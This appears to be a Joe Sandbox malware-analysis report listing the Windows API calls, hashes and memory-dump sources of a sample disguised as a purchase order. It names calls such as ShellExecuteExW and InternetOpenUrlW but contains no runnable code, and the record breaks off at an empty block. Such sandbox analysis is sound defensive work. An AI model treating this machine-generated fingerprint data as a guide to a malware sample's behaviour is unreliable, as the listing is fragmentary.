                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$]$h
                                                    • API String ID: 4104443479-3262404753
                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                    • String ID: <$@
                                                    • API String ID: 2417854910-1426351568
                                                    • Opcode ID: 1aa1fbc85180a380a9b3b8a5554333435a2b081482e0f653ddbe988ea1281896
                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                    • Opcode Fuzzy Hash: 1aa1fbc85180a380a9b3b8a5554333435a2b081482e0f653ddbe988ea1281896
                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3705125965-3916222277
                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                    APIs
                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                    • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                    • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                    • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                    • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                    • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                    • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 3375834691-2298589950
                                                    • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                    • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                    • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                    • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: $<
                                                    • API String ID: 4104443479-428540627
                                                    • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                    • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                    • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                    • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                    • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                    • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                    • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID: \VH
                                                    • API String ID: 1682464887-234962358
                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: \VH
                                                    • API String ID: 2507767853-234962358
                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                    • String ID: crts
                                                    • API String ID: 943502515-3724388283
                                                    • Opcode ID: 980354a1e725ddff6be093d26cfad83e9eaf79299ee4a5b53f79d1194df6727a
                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                    • Opcode Fuzzy Hash: 980354a1e725ddff6be093d26cfad83e9eaf79299ee4a5b53f79d1194df6727a
                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$LabelVolume
                                                    • String ID: \VH
                                                    • API String ID: 2006950084-234962358
                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                    • DrawMenuBar.USER32 ref: 00449761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                    • String ID: 0
                                                    • API String ID: 772068139-4108050209
                                                    • Opcode ID: 844eb499e32ceec114fe8db52b48e8b0513a0dd8f20e481ba683b0b5f402916a
                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                    • Opcode Fuzzy Hash: 844eb499e32ceec114fe8db52b48e8b0513a0dd8f20e481ba683b0b5f402916a
                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
